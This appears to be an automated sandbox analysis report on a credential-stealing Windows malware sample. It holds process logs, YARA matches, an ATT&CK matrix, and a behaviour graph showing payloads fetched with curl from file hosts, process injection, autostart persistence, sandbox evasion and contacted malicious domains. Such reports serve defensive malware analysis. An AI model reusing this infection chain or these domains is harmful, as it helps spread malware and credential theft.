                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016F654 cpuid 5_2_0016F654
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF68B4CB920
                                Source: C:\Windows\Speech\kdmapper.exeCode function: GetLocaleInfoW,GetNumberFormatW,5_2_0016AF0F
                                Source: C:\Windows\Speech\physmeme.exeQueries volume information: C:\Windows\Speech\physmeme.exe VolumeInformationJump to behavior
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformationJump to behavior
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeQueries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeQueries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeQueries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeQueries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeQueries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CB79C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF68B4CB79C
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015B146 GetVersionExW,5_2_0015B146
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: 4tXm5yPtiy.exe, 4tXm5yPtiy.exe, 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmp, 4tXm5yPtiy.exe, 00000000.00000000.1415368095.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ollydbg.exe

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 0000000F.00000002.1706544888.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 4584, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 6872, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 5.3.kdmapper.exe.66016cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.0.msedge.exe.c90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.66016cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.65ff6cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.65ff6cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000000.1650599430.0000000000C92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: 5.3.kdmapper.exe.66016cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.0.msedge.exe.c90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.66016cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.65ff6cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.65ff6cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 0000000F.00000002.1706544888.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 4584, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 6872, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 5.3.kdmapper.exe.66016cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.0.msedge.exe.c90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.66016cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.65ff6cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.65ff6cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000000.1650599430.0000000000C92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: 5.3.kdmapper.exe.66016cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.0.msedge.exe.c90000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.66016cf.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.65ff6cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.kdmapper.exe.65ff6cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting
                                Valid Accounts11
                                Windows Management Instrumentation
                                11
                                Scripting
                                1
                                DLL Side-Loading
                                11
                                Disable or Modify Tools
                                21
                                Input Capture
                                1
                                System Time Discovery
                                1
                                Taint Shared Content
                                11
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts3
                                Native API
                                1
                                DLL Side-Loading
                                411
                                Process Injection
                                111
                                Deobfuscate/Decode Files or Information
                                LSASS Memory3
                                File and Directory Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution
                                21
                                Registry Run Keys / Startup Folder
                                21
                                Registry Run Keys / Startup Folder
                                4
                                Obfuscated Files or Information
                                Security Account Manager37
                                System Information Discovery
                                SMB/Windows Admin Shares21
                                Input Capture
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts3
                                Command and Scripting Interpreter
                                Login HookLogin Hook3
                                Software Packing
                                NTDS551
                                Security Software Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                114
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                PowerShell
                                Network Logon ScriptNetwork Logon Script1
                                DLL Side-Loading
                                LSA Secrets241
                                Virtualization/Sandbox Evasion
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                File Deletion
                                Cached Domain Credentials2
                                Process Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                                Masquerading
                                DCSync1
                                Application Window Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                                Virtualization/Sandbox Evasion
                                Proc Filesystem1
                                Remote System Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                                Process Injection
                                /etc/passwd and /etc/shadow1
                                System Network Configuration Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522831 Sample: 4tXm5yPtiy.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 145 zelensky.top 2->145 147 tiddymarktwo.shop 2->147 149 11 other IPs or domains 2->149 159 Suricata IDS alerts for network traffic 2->159 161 Found malware configuration 2->161 163 Antivirus detection for URL or domain 2->163 165 18 other signatures 2->165 12 4tXm5yPtiy.exe 2 2->12         started        15 wCnmgKwwXYQbWeNvWeCCOp.exe 2->15         started        18 msedge.exe 2->18         started        20 5 other processes 2->20 signatures3 process4 file5 189 Tries to detect sandboxes and other dynamic analysis tools (window names) 12->189 191 Drops executables to the windows directory (C:\Windows) and starts them 12->191 193 Hides threads from debuggers 12->193 195 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 12->195 22 kdmapper.exe 3 6 12->22         started        26 physmeme.exe 2 12->26         started        28 cmd.exe 1 12->28         started        34 2 other processes 12->34 129 C:\Users\user\Desktop\wDtsBZWh.log, PE32 15->129 dropped 131 C:\Users\user\Desktop\VPYFfuwr.log, PE32 15->131 dropped 133 C:\Users\user\Desktop\TUtPMNAm.log, PE32 15->133 dropped 141 3 other malicious files 15->141 dropped 197 Antivirus detection for dropped file 15->197 199 Multi AV Scanner detection for dropped file 15->199 201 Machine Learning detection for dropped file 15->201 30 cmd.exe 15->30         started        135 C:\Users\user\Desktop\uIZJMPyD.log, PE32 18->135 dropped 137 C:\Users\user\Desktop\eGTFsMJp.log, PE32 18->137 dropped 139 C:\Users\user\Desktop\UXzpIjDH.log, PE32 18->139 dropped 143 3 other malicious files 18->143 dropped 32 cmd.exe 18->32         started        signatures6 process7 file8 101 C:dge\msedge.exe, PE32 22->101 dropped 103 C:dge\L6lFlVnd0szYUYb26bZc.vbe, data 22->103 dropped 171 Multi AV Scanner detection for dropped file 22->171 36 wscript.exe 1 22->36         started        173 Contains functionality to inject code into remote processes 26->173 175 Writes to foreign memory regions 26->175 177 Allocates memory in foreign processes 26->177 183 2 other signatures 26->183 39 RegAsm.exe 26->39         started        42 conhost.exe 26->42         started        179 Uses ping.exe to sleep 28->179 181 Uses ping.exe to check the status of other devices and networks 28->181 44 curl.exe 2 28->44         started        47 wCnmgKwwXYQbWeNvWeCCOp.exe 30->47         started        49 conhost.exe 30->49         started        53 2 other processes 30->53 55 4 other processes 32->55 51 curl.exe 2 34->51         started        signatures9 process10 dnsIp11 167 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->167 169 Suspicious execution chain found 36->169 57 cmd.exe 1 36->57         started        151 offeviablwke.site 104.21.84.213, 443, 49711 CLOUDFLARENETUS United States 39->151 153 steamcommunity.com 104.102.49.254, 443, 49710 AKAMAI-ASUS United States 39->153 155 file.garden 188.114.96.3, 443, 49706, 49709 CLOUDFLARENETUS European Union 44->155 157 127.0.0.1 unknown unknown 44->157 109 C:\Windows\Speech\kdmapper.exe, PE32 44->109 dropped 111 C:\Users\user\Desktop\zrKsasrd.log, PE32 47->111 dropped 113 C:\Users\user\Desktop\rWRTdVVu.log, PE32 47->113 dropped 115 C:\Users\user\Desktop\fZXNGngO.log, PE32 47->115 dropped 119 3 other malicious files 47->119 dropped 59 cmd.exe 47->59         started        117 C:\Windows\Speech\physmeme.exe, PE32 51->117 dropped file12 signatures13 process14 process15 61 msedge.exe 6 26 57->61         started        65 conhost.exe 57->65         started        67 conhost.exe 59->67         started        69 chcp.com 59->69         started        71 w32tm.exe 59->71         started        file16 121 C:\Users\user\Desktop\iacMOeMk.log, PE32 61->121 dropped 123 C:\Users\user\Desktop\XmyVeTRC.log, PE32 61->123 dropped 125 C:\Users\user\Desktop\WpXNITDI.log, PE32 61->125 dropped 127 5 other malicious files 61->127 dropped 203 Antivirus detection for dropped file 61->203 205 Multi AV Scanner detection for dropped file 61->205 207 Creates an undocumented autostart registry key 61->207 209 4 other signatures 61->209 73 csc.exe 61->73         started        77 csc.exe 61->77         started        79 powershell.exe 61->79         started        81 2 other processes 61->81 signatures17 process18 file19 105 C:\Program Files (x86)\...\msedge.exe, PE32 73->105 dropped 185 Infects executable files (exe, dll, sys, html) 73->185 83 conhost.exe 73->83         started        85 cvtres.exe 73->85         started        107 C:\Windows\...\SecurityHealthSystray.exe, PE32 77->107 dropped 87 conhost.exe 77->87         started        89 cvtres.exe 77->89         started        187 Loading BitLocker PowerShell Module 79->187 91 conhost.exe 79->91         started        93 WmiPrvSE.exe 79->93         started        95 conhost.exe 81->95         started        97 conhost.exe 81->97         started        99 3 other processes 81->99 signatures20 process21

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                4tXm5yPtiy.exe58%ReversingLabsWin64.Spyware.Lummastealer
                                4tXm5yPtiy.exe100%AviraHEUR/AGEN.1317356
                                SourceDetectionScannerLabelLink
                                C:\Users\user\Desktop\DqsZwsEl.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\MQUzRRxE.log100%AviraTR/PSW.Agent.qngqt
                                C:\Edge\L6lFlVnd0szYUYb26bZc.vbe100%AviraVBS/Runner.VPG
                                C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat100%AviraBAT/Delbat.C
                                C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe100%AviraHEUR/AGEN.1323342
                                C:\Edge\msedge.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\Desktop\NKJXVMBv.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat100%AviraBAT/Delbat.C
                                C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat100%AviraBAT/Delbat.C
